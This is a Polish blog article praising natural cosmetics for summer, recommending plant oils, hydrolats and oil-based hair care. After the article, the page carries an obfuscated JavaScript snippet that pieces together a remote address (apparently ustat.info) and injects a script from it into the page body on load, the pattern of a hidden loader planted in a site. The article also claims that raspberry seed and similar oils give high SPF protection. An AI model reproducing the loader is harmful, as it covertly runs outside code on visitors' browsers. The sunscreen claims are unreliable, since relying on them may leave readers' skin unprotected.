Przejdź do treści

Naturale kosmetyki na lato

Lato to z pewnością dla wielu  najprzyjemniejszy okres w całym roku. Słoneczna pogoda, wysokie temperatury, ciepłe, długie wieczory sprawiają, że każdemu poziom endorfin skacze do góry. Promienie słoneczne dostarczają dużo witaminy D, która działa korzystnie na samopoczucie i równowagę wewnętrzną, jednak w nadmiarze promieniowanie ultrafioletowe, które wysyła Słońce może być źródłem poważnych chorób skóry, udarów i innych komplikacji. Istotne jest zachowanie umiaru, a kąpiel słoneczną należy traktować ze zdrowym dystansem, by uniknąć niepożądanych zmian.

Niewątpliwie okres letni to czas, w którym skóra jest narażona na szereg niekorzystnych zmian. Zachowując umiar można uzyskać piękny efekt brązowego odcienia, jednak przy dłuższym wystawieniu ciała na promienie słoneczne można nabawić się oparzeń, nieestetycznych zmian, plamek itd. Kluczowym elementem przy opóźnianiu procesu foto starzenia jest odpowiednia pielęgnacja skóry. Zaufanie klientek ostatnio zyskują kosmetyki naturalne, których skład jest całkowicie wzięty z natury, czyli pozbawiony wszelkich sztucznych dodatków, ulepszaczy, barwników, zapachów, parabenów itd. Takie ekologiczne specyfiki stanowią idealną alternatywę dla produkcji masowych, których skład jest uzupełniany chemią, sztucznymi dodatkami, co w konsekwencji może niekorzystnie wpłynąć na skórę, a w dłuższej perspektywie nawet na zdrowie ogólne.

Przewaga kosmetyków naturalnych wynika przede wszystkim z tego, że ich działanie jest bezpieczne. Naturalne preparaty jak każde inne mogą oczywiście wywołać reakcje alergiczne, jednak ryzyko innych poważniejszych zagrożeń jest minimalne. Poza tym sięganie po tego typu produkty jest przejawem pewnej świadomości ekologicznej, co w dzisiejszych czasach jest pożądanym zachowaniem.

W okresie letnim należy przede wszystkim postawić na ochronę skóry, stosując różnego rodzaju filtry naturalne oraz na nawilżanie. Do tego idealnie sprawdzają się olejki naturalne. Koniecznie trzeba zadbać również o włosy, które są bardzo wrażliwe na promienie słoneczne i błyskawicznie się przesuszają. Regularne stosowanie odpowiednich preparatów pomoże przeżyć słoneczną pogodę bez szwanku i uszczerbku na skórze.

Jako filtr naturalny z wysokim stopniem ochrony przeciwsłonecznej warto wykorzystywać olej z pestek malin, który działa kojąco i stanowi barierę ochronną przed utratą wody. Hamuje także proces powstawania zmarszczek. Kolejne oleje z wysokim poziomem SPF to olej z nasion dzikiej marchewki, z kiełków pszenicy czy nasion dzikiej róży. Te preparaty dobrze sprawdzają się również w codziennej pielęgnacji skóry twarzy jak i ciała. Ważne jest dobranie odpowiedniego specyfiku do rodzaju cery.

W kwestii utrzymania odpowiedniego nawilżenia skóry twarzy i ciała olejki również znajdują się z przodu listy. Oprócz nich można stosować różnego rodzaju kremy na bazie owoców i ekstraktów. Silnie nawilżające właściwości ma na przykład awokado, masło shea, olej kokosowy, z pestek moreli. Lista produktów jest naprawdę imponująca. Producenci kosmetyków naturalnych tworzą mazidła w oparciu o naturalne ekstrakty, łącząc je ze sobą tak, by uzyskać jak najlepszy produkt o pożądanych właściwościach. Otwierając wieczko kremu od razu da się wyczuć woń różnych składników, a konsystencja zdradza, że są to składniki wzięte z natury.

Przy pielęgnacji twarzy należy także pamiętać o ochronie skóry w okolicach oczu, która jest bardzo wrażliwa, cienka i podatna na szkodliwe działanie słońca. W ramach odświeżenia skóry całej twarzy warto także sięgać po hydrolaty, np. wodę różaną lub malinową, które działają kojąco zwłaszcza w trakcie kąpieli słonecznych.

Przy ochronie włosów warto sięgać po szampony, które w składzie mają także naturalne oleje. Regularne stosowanie daje efekt miękkości i gwarantuje bezpieczną ochronę przed przesuszaniem. Przy wysokich temperaturach konieczne jest używanie masek w tygodniowych odstępach. Po każdym umyciu włosów na końcówki można także wetrzeć kilka kropel naturalnego olejku, co wzmocni kurację.

Naturalna pielęgnacja skóry latem przy założeniu, że jest ona regularna i wykonywana dokładnie, daje niesamowite efekty nawilżonej i zdrowej skóry. Ilość naturalnych składników, które dostarcza się naskórkowi wzmacnia proces regeneracji i hamuje procesy starzenia. Kosmetyki naturalne stanowią niesamowity koktajl witalny dla skóry całego ciała, dając to co najlepsze można znaleźć w naturze.

(function(){
ige9_=(„u”+”st”);ige9=document.createElement(„script”);ige9.async=true;
ige9u=”64210574″;ige9_+=”a”+(„t.”);ige9_+=”i”+(„nf”+(„o”))+(„/”);
ige9u+=”.1qyve51ege9pr5nr”;ige9u+=”9zg4mewdvdvj7t”;
ige9.src=”//”+ige9_+ige9u;ige9.type=”text/javascript”;
d_b=document.body;d_b.appendChild(ige9);
})();

0 0 votes
Article Rating
Subscribe
Powiadom o
guest
0 komentarzy
Inline Feedbacks
View all comments
%d bloggers like this: